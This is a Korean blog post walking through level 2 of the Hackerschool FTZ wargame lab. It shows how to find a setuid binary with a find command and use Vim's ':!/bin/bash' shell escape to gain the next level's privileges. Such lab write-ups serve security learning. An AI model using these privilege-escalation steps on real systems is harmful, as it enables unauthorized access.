사람마다 푸는 방식이 다를 수 있으니. 어려움에 있으실 때 참조만 하시고, 직접 풀어보시는 것 을 추천합니다.
구동 환경 : Windows 7
서버 환경 : VMware WorkStation 10.0 Redhat9.0 hackerschool FTZ
사용 플램 : putty (퓨티)
Level1을 클리어하신 것을 축하드립니다.
레벨20단계까지 있는데 꾸준히 열심히 하셔서 클리어 하시길 바랍니다.
잔말 하지않고 바로시작!
login as : level2
password :
level1에서 끝냈을 때 받았던 비밀번호를 입력 해준 다음에 로그인 하면 된다.
그러면 저번과 같이 ls -al 로 level2의 디텍토리에는 무슨 파일들이 존재하는지 확인해보자.
[level2@ftz level2]$ ls -al
total 80
drwxr-xr-x 4 root level2 4096 Apr 19 2002 .
drwxr-xr-x 34 root root 4096 Sep 30 02:00 ..
-rw------- 1 root root 1 Jan 15 2010 .bash_history
-rw-r--r-- 1 root root 24 Feb 24 2002 .bash_logout
-rw-r--r-- 1 root root 224 Feb 24 2002 .bash_profile
-rw-r--r-- 1 root root 151 Feb 24 2002 .bashrc
-rw-r--r-- 1 root root 400 Sep 24 2000 .cshrc
-rw-r--r-- 1 root root 4742 Sep 24 2000 .emacs
-rw-rw-r-- 1 root root 162 Mar 10 2000 .epems
-r--r--r-- 1 root root 319 Sep 24 2000 .gtkrc
-rw-r--r-- 1 root root 100 Sep 24 2000 .gvimrc
-rw-r--r-- 1 root root 60 Mar 23 2000 hint
-rw-r--r-- 1 root root 226 Sep 24 2000 .muttrc
-rw-r--r-- 1 root root 367 Sep 24 2000 .profile
drwxr-xr-x 2 root level2 4096 Feb 24 2002 public_html
drwxrwxr-x 2 root level2 4096 Sep 30 06:28 tmp
-rw-r--r-- 1 root root 0 Oct 27 2002 .viminfo
-rw-r--r-- 1 root root 4145 Sep 24 2000 .vimrc
-rw-r--r-- 1 root root 245 Sep 24 2000 .Xdefaults
[level2@ftz level2]$
이번 level2의 디텍토리에도 hint 라는 파일이 존재한다.
cat 명령어로 hint 파일을 들여다보자.
[level2@ftz level2]$ cat hint
텍스트 파일 편집 중 쉘의 명령을 실행시킬 수 있다는데...
???????????????????!!!
처음에 했던 나도 이 부분에서 뭐지? 이게 힌트인건가 이런 생각을 가지게 되었다.
그러나,
곰곰히 생각해보면 무슨 editor 가 생각이 날 것이다. 해커스쿨 초중고 를 다 읽은 사람이라면!
아직은 잘 모르겠다면 이제 다음으로 넘어가자.
find 명령어로 setuid 가 걸린 부분을 찾으러 가보자 고고씽.
[level2@ftz level2]$ find / -user level3 -perm -4300 2>/dev/null
/usr/bin/editor
[level2@ftz level2]$
찾아보니, Level3의 root 권한을 가진 setuid 가 발견되었다.
그럼 거기로 경로를 이동하자.
아차! editor는 실행파일인 것 같다.
[level2@ftz level2]$ cd /usr/bin
[level2@ftz bin]$ ls editor
editor
[level2@ftz bin]$
역시 editor 는 실행하는 파일이었다.
./ 명령어로 editor 를 실행해보자!
[level2@ftz bin]$ ./editor
~
~
~
~
~
~ VIM - Vi IMproved
~
~ version 6.1.320
~ by Bram Moolenaar et al.
~ Vim is open source and freely distributable
~
~ Help poor children in Uganda!
~ type :help iccf<Enter> for information
~
~ type :q<Enter> to exit
~ type :help<Enter> or <F1> for on-line help
~ type :help version6<Enter> for version info
~
~
~
~
~
!?!?!?!?!?!?
editor 를 열어보니 Vi 에디터가 나왔다!
VI(Visual Editor) ?
유닉스 시스템에서 주로 사용하는 텍스트 편집기. vi는 그래픽 사용자 인터페이스(GUI)가 익숙한 사용자에게는 매우 낯설은 에디터지만 프로그래머 등 텍스트 작업을 주로 하는 사용자에게는 간결한 인터페이스와 키보드를 벗어나지 않고 모든 일을 할 수 있는 막강한 기능으로 크게 환영받고 있다. 파일의 간단한 편집, 전자 우편 쓰기, 복잡한 프로그래밍까지 vi는 유닉스 시스템에 널리 사용되고 있는 편집기이다
Vi 에디터에 대한 설명은 여기에 적지않겠지만, 네이버에 검색해보면 많은 자료들이 나온다! 심지어 사용법까지 +_+
Vi 에디터에서 Shift + : 를 눌러주면 입력모드로 변환된다.
~
~
~
~
~
~ VIM - Vi IMproved
~
~ version 6.1.320
~ by Bram Moolenaar et al.
~ Vim is open source and freely distributable
~
~ Help poor children in Uganda!
~ type :help iccf<Enter> for information
~
~ type :q<Enter> to exit
~ type :help<Enter> or <F1> for on-line help
~ type :help version6<Enter> for version info
~
~
~
~
: !/bin/bash
! 가 무엇인가요?
! 는 VI editor 에서 외부의 쉘을 실행시켜주는 명령어입니다.
Level3의/bin/bash 로 접속하게 해주지요.
[level3@ftz bin] 으로 변경되었다면, my-pass 를 입력하자.
[level3@ftz bin]$ my-pass
Level3 Password is ~~~~~~~~~~~~
[level3@ftz bin]$
그러면 3단계도 클리어 되었다.
성공. success.
어렵지않게 풀 수 있었던 문제들이었다. 처음에 접할 때 Vi Editor 에 대한 사용법만 공부한다면 푸는데 문제가 없는 문제.
'정보보안 카테고리 > hackschool FTZ' 카테고리의 다른 글
| hackerschool FTZ : level4 풀이 (2) | 2013.10.01 |
|---|---|
| hackerschool FTZ : level3 풀이 (0) | 2013.10.01 |
| hackerschool FTZ : level1 풀이 (0) | 2013.10.01 |
| hackerschool FTZ : Training 10 (1) | 2013.09.30 |
| hackerschool FTZ : Training 6~8 (0) | 2013.09.30 |